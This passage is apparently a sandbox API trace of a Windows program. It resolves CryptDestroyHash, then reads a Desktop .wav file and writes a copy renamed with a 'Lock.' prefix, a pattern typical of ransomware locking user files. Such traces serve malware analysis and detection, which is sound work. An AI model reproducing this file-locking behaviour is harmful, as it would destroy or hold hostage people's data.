HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0189.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e10 [0189.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0189.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0189.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.083] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0189.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0189.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.083] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0189.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0189.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.090] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0189.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/SFHBP1D1LBQEeR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sfhbp1d1lbqeer.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0189.091] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.091] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0189.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0189.091] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.092] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0189.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.SFHBP1D1LBQEeR.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.sfhbp1d1lbqeer.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0189.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0189.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.094] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.094] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.094] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0189.094] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0189.096] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x3415, lpOverlapped=0x0) returned 1 [0189.097] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0189.098] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0189.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13415) returned 0x24d7a58 [0189.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0189.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.100] HeapFree (in: 